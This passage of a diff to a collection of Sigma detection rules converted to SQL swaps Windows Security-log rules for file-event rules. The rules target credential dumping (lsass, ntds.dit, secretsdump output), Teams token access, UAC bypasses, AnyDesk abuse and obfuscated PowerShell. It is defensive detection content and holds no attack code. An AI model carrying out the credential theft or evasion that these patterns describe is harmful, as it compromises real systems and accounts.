'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\PowerShell\\\\StartupProfileData-Interactive' ESCAPE '\\')" ], - "filename": "win_security_tap_driver_installation.yml" + "filename": "file_event_win_susp_system_interactive_powershell.yml" }, { - "title": "Win Susp Computer Name Containing Samtheadmin", - "id": "39698b3f-da92-4bc6-bfb5-645a98386e45", + "title": "Potential Remote Credential Dumping Activity", + "id": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", "status": "experimental", - "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", - "author": "elhoim", + "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", + "author": "SecurityAura", "tags": [ - "cve.2021.42278", - "cve.2021.42287", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1078" + 
"attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((SamAccountName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND SamAccountName LIKE '%$' ESCAPE '\\') OR (TargetUserName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename REGEXP '\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$')" ], - "filename": "win_security_susp_computer_name.yml" + "filename": "file_event_win_remote_cred_dump.yml" }, { - "title": "Admin User Remote Logon", - "id": "0f63e1ef-1eb9-4226-9d54-8927ca08520a", + "title": "Suspicious Scheduled Task Write to System32 Tasks", + "id": "80e1f67a-4596-4351-98f5-a9c3efabac95", "status": "test", - "description": "Detect remote login by Administrator user (depending on internal pattern).", - "author": "juju4", + "description": "Detects the creation of tasks from processes executed from suspicious locations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1078.001", - "attack.t1078.002", - "attack.t1078.003", - "car.2016-04-005" + "attack.persistence", + "attack.execution", + "attack.t1053" ], "falsepositives": [ - "Legitimate administrative activity." 
+ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND AuthenticationPackageName = 'Negotiate' AND TargetUserName LIKE 'Admin%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Windows\\\\System32\\\\Tasks%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\config\\\\systemprofile%' ESCAPE '\\'))" ], - "filename": "win_security_admin_rdp_login.yml" + "filename": "file_event_win_susp_task_write.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", - "id": "fd0f5778-d3cb-4c9a-9695-66759d04702a", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "Suspicious PROCEXP152.sys File Created In TMP", + "id": "3da70954-0f2c-4103-adff-b7440368f50e", + "status": "test", + "description": "Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.\nThis driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.\n", + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.t1562.001", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it." 
], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ServiceFileName REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ServiceFileName REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ServiceFileName REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ServiceFileName REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ServiceFileName REGEXP '\\$VerbosePreference\\.ToString\\(' OR ServiceFileName REGEXP '\\String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%PROCEXP152.sys' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\procexp64.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procmon64.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procmon.exe%' ESCAPE '\\')))" ], - "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" + "filename": "file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml" }, { - "title": "Security Eventlog Cleared", - "id": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", + "title": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File", + "id": "d353dac0-1b41-46c2-820c-d7d2561fc6ed", "status": "test", - "description": "One of the Windows Eventlogs has been cleared. e.g. 
caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", + "author": "Julia Fomina, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.t1216" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Unlikely" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '517' AND Provider_Name = 'Security') OR (EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%WsmPty.xsl' ESCAPE '\\' OR TargetFilename LIKE '%WsmTxt.xsl' ESCAPE '\\') AND NOT ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_susp_eventlog_cleared.yml" + "filename": "file_event_win_winrm_awl_bypass.yml" }, { - "title": "DiagTrackEoP Default Login Username", - "id": "2111118f-7e46-4fc8-974a-59fd8ec95196", - "status": "experimental", - "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PowerShell Profile Modification", + "id": "b5b78988-486d-4a80-b991-930eff3ff8bf", + "status": "test", + "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", + "author": "HieuTT35, Nasreddine Bencherchali", "tags": [ - "attack.privilege_escalation" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.013" ], "falsepositives": [ - "Unlikely" + "System administrator creating 
Powershell profile manually" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND TargetOutboundUserName = 'thisisnotvaliduser')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft.PowerShell\\_profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WindowsPowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Program Files\\\\PowerShell\\\\7\\\\profile.ps1' ESCAPE '\\')" ], - "filename": "win_security_diagtrack_eop_default_login_username.yml" + "filename": "file_event_win_susp_powershell_profile.yml" }, { - "title": "RDP over Reverse SSH Tunnel WFP", - "id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", + "title": "Suspicious File Event With Teams Objects", + "id": "6902955a-01b7-432c-b32a-6f5f81d8f624", "status": "experimental", - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", - "author": "Samir Bousseaden", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1090.001", - "attack.t1090.002", - "attack.t1021.001", - "car.2013-07-002" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ - "Programs that connect locally to the RDP port" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND ((SourcePort = '3389' AND (DestAddress LIKE '127.%' ESCAPE '\\' OR DestAddress LIKE '::1' ESCAPE '\\')) OR (DestPort = '3389' AND (SourceAddress LIKE '127.%' ESCAPE '\\' OR SourceAddress LIKE '::1' ESCAPE '\\')))) AND NOT ((FilterOrigin = 'AppContainer Loopback') OR 
((Application LIKE '%\\\\thor.exe' ESCAPE '\\' OR Application LIKE '%\\\\thor64.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" ], - "filename": "win_security_rdp_reverse_tunnel.yml" + "filename": "file_event_win_access_susp_teams.yml" }, { - "title": "Unauthorized System Time Modification", - "id": "faa031b5-21ed-4e02-8881-2591f98d82ed", + "title": "Advanced IP Scanner - File Event", + "id": "fed85bf9-e075-4280-9159-fbe8a023d6fa", "status": "test", - "description": "Detect scenarios where a potentially unauthorized application or user is modifying the system time.", - "author": "@neu5ron", + "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", + "author": "@ROxPinTeddy", "tags": [ - "attack.defense_evasion", - "attack.t1070.006" + "attack.discovery", + "attack.t1046" ], "falsepositives": [ - "HyperV or other virtualization technologies with binary not listed in filter portion of detection" + "Legitimate administrative use" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4616' AND NOT (((ProcessName LIKE 'C:\\\\Program Files\\\\VMware\\\\VMware Tools\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\VBoxService.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\oobe\\\\msoobe.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND SubjectUserSid = 'S-1-5-19')))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Advanced IP Scanner 2%' ESCAPE '\\'" ], - "filename": "win_security_susp_time_modification.yml" + "filename": "file_event_win_advanced_ip_scanner.yml" }, { - 
"title": "Processes Accessing the Microphone and Webcam", - "id": "8cd538a4-62d5-4e83-810b-12d41e428d6e", + "title": "Suspicious Unattend.xml File Access", + "id": "1a3d42dd-3763-46b9-8025-b5f17f340dfb", "status": "test", - "description": "Potential adversaries accessing the microphone and webcam in an endpoint.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.\nIf these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process\n", + "author": "frack113", "tags": [ - "attack.collection", - "attack.t1123" + "attack.credential_access", + "attack.t1552.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4663') AND (ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\microphone\\\\NonPackaged%' ESCAPE '\\' OR ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\webcam\\\\NonPackaged%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\unattend.xml' ESCAPE '\\'" ], - "filename": "win_security_camera_microphone_access.yml" + "filename": "file_event_win_access_susp_unattend_xml.yml" }, { - "title": "Access to ADMIN$ Share", - "id": "098d7118-55bc-4912-a836-dc6483a8d150", + "title": "Suspicious Outlook Macro Created", + "id": "117d3d3a-755c-4a61-b23e-9171146d094c", "status": "test", - "description": "Detects access to $ADMIN share", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of a macro file for Outlook.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + 
"attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" ], "falsepositives": [ - "Legitimate administrative activity" + "Unlikely" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5140' AND ShareName = 'Admin$') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\'))" ], - "filename": "win_security_admin_share_access.yml" + "filename": "file_event_win_office_outlook_susp_macro_creation.yml" }, { - "title": "Suspicious Scheduled Task Creation", - "id": "3a734d25-df5c-4b99-8034-af1ddb5883a4", + "title": "Created Files by Microsoft Sync Center", + "id": "409f8a98-4496-4aaa-818a-c931c0a8b832", "status": "experimental", - "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "This rule detects suspicious files created by Microsoft Sync Center (mobsync)", + "author": "elhoim", "tags": [ + "attack.t1055", + "attack.t1218", "attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND (TaskContent LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Temporary Internet%' 
ESCAPE '\\' OR TaskContent LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContent LIKE '%regsvr32%' ESCAPE '\\' OR TaskContent LIKE '%rundll32%' ESCAPE '\\' OR TaskContent LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContent LIKE '%cmd%' ESCAPE '\\' OR TaskContent LIKE '%/c %' ESCAPE '\\' OR TaskContent LIKE '%/k %' ESCAPE '\\' OR TaskContent LIKE '%/r %' ESCAPE '\\' OR TaskContent LIKE '%powershell%' ESCAPE '\\' OR TaskContent LIKE '%pwsh%' ESCAPE '\\' OR TaskContent LIKE '%mshta%' ESCAPE '\\' OR TaskContent LIKE '%wscript%' ESCAPE '\\' OR TaskContent LIKE '%cscript%' ESCAPE '\\' OR TaskContent LIKE '%certutil%' ESCAPE '\\' OR TaskContent LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContent LIKE '%bash.exe%' ESCAPE '\\' OR TaskContent LIKE '%bash %' ESCAPE '\\' OR TaskContent LIKE '%scrcons%' ESCAPE '\\' OR TaskContent LIKE '%wmic %' ESCAPE '\\' OR TaskContent LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContent LIKE '%forfiles%' ESCAPE '\\' OR TaskContent LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContent LIKE '%hh.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\mobsync.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\'))" ], - "filename": "win_security_susp_scheduled_task_creation.yml" + "filename": "file_event_win_susp_creation_by_mobsync.yml" }, { - "title": "Remote WMI ActiveScriptEventConsumers", - "id": "9599c180-e3a8-4743-8f92-7fb96d3be648", + "title": "UAC Bypass Using Consent and Comctl32 - File", + "id": "62ed5b55-f991-406a-85d9-e8e8fdf18789", "status": "test", - "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - 
"attack.lateral_movement", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.003" + "attack.t1548.002" ], "falsepositives": [ - "SCCM" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4624' AND LogonType = '3' AND ProcessName LIKE '%scrcons.exe' ESCAPE '\\') AND NOT (TargetLogonId = '0x3e7'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.@%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml" + "filename": "file_event_win_uac_bypass_consent_comctl32.yml" }, { - "title": "Transferring Files with Credential Data via Network Shares", - "id": "910ab938-668b-401b-b08c-b596e80fdca5", - "status": "test", - "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "Suspicious Binary Writes Via AnyDesk", + "id": "2d367498-5112-4ae5-a06a-96e7bc33a211", + "status": "experimental", + "description": "Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. 
(See reference section for more details)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.001", - "attack.t1003.003" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Transferring sensitive files for legitimate administration work by legitimate administrator" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND (RelativeTargetName LIKE '%\\\\mimidrv%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\lsass%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\windows\\\\minidump\\\\%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\hiberfil%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\sqldmpr%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\sam%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\ntds.dit%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\security%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\anydesk.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\\\gcapi.dll' ESCAPE '\\')))" ], - "filename": "win_security_transf_files_with_cred_data_via_network_shares.yml" + "filename": "file_event_win_anydesk_writing_susp_binaries.yml" }, { - "title": "OilRig APT Schedule Task Persistence - Security", - "id": "c0580559-a6bd-4ef6-b9b7-83703d98b561", + "title": "Anydesk Temporary Artefact", + "id": "0b9ad457-2554-44c1-82c2-d56a99c42377", "status": "test", - "description": "Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control 
channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", "attack.command_and_control", - "attack.t1071.004" + "attack.t1219" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND TaskName IN ('SC Scheduled Scan', 'UpdatMachine'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\AnyDesk\\\\user.conf%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\AnyDesk\\\\system.conf%' ESCAPE '\\') AND TargetFilename LIKE '%.temp' ESCAPE '\\')" ], - "filename": "win_security_apt_oilrig_mar18.yml" + "filename": "file_event_win_anydesk_artefact.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - Security", - "id": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Dumpert Process Dumper Default File", + "id": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", + "status": "test", + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "high", + "level": 
"critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%(Clipboard|i%' ESCAPE '\\')" + "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\dumpert.dmp' ESCAPE '\\'" ], - "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml" + "filename": "file_event_win_hktl_dumpert.yml" }, { - "title": "Replay Attack Detected", - "id": "5a44727c-3b85-4713-8c44-4401d5499629", - "status": "experimental", - "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", - "author": "frack113", + "title": "Potential DCOM InternetExplorer.Application DLL Hijack", + "id": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", + "status": "test", + "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" + ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4649')" + "SELECT * FROM logs WHERE (NewProcessName = 'System' AND TargetFilename LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" ], - "filename": "win_security_replay_attack_detected.yml" + "filename": "file_event_win_dcom_iertutil_dll_hijack.yml" }, { - "title": "Locked Workstation", - "id": "411742ad-89b0-49cb-a7b0-3971b5c1e0a4", - "status": "stable", - "description": "Automatically lock workstation sessions after a standard period of inactivity.\nThe case is not applicable for Unix OS. 
Supported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019.\n", - "author": "Alexandr Yampolskyi, SOC Prime", + "title": "UAC Bypass Using IEInstal - File", + "id": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", + "status": "test", + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "author": "Christian Burkard (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4800')" + "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\IEInstal.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%consent.exe' ESCAPE '\\')" ], - "filename": "win_security_workstation_was_locked.yml" + "filename": "file_event_win_uac_bypass_ieinstal.yml" }, { - "title": "Invoke-Obfuscation RUNDLL LAUNCHER - Security", - "id": "f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca", + "title": "SCR File Write Event", + "id": "c048f047-7e2a-4888-b302-55f509d4a91d", "status": "experimental", - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects the creation of screensaver files (.scr) outside of system folders. 
Attackers may execute an application as an \".SCR\" file using \"rundll32.exe desk.cpl,InstallScreenSaver\" for example.", + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "The installation of new screen savers by third party software" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%rundll32.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.scr' ESCAPE '\\' AND NOT ((TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE ':\\\\WUDownloadCache\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_invoke_obfuscation_via_rundll_services_security.yml" + "filename": "file_event_win_new_src_file.yml" }, { - "title": "Group Modification Logging", - "id": "9cf01b6c-e723-4841-a868-6d7f8245ca6e", - "status": "stable", - "description": "Configure systems to issue a log entry and alert when an account is added to or removed from any group assigned administrative privileges.\nSigma detects\nEvent ID 4728 indicates a ‘Member is added to a Security Group’.\nEvent ID 4729 indicates a ‘Member is removed from a Security enabled-group’ .\nEvent ID 4730 indicates a ‘Security Group is deleted’.\nThe case is not applicable for Unix OS.\nSupported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019, Windows Server 2000, Windows 2003 and XP.\n", - "author": "Alexandr Yampolskyi, 
SOC Prime", + "title": "ISO File Created Within Temp Folders", + "id": "2f9356ae-bf43-41b8-b858-4496d83b2acb", + "status": "experimental", + "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", + "author": "@sam0x90", + "tags": [ + "attack.initial_access", + "attack.t1566.001" + ], "falsepositives": [ - "Unknown" + "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4728', '4729', '4730', '633', '632', '634'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.zip\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\Content.Outlook\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\'))" ], - "filename": "win_security_group_modification_logging.yml" + "filename": "file_event_win_iso_file_mount.yml" }, { - "title": "AD User Enumeration", - "id": 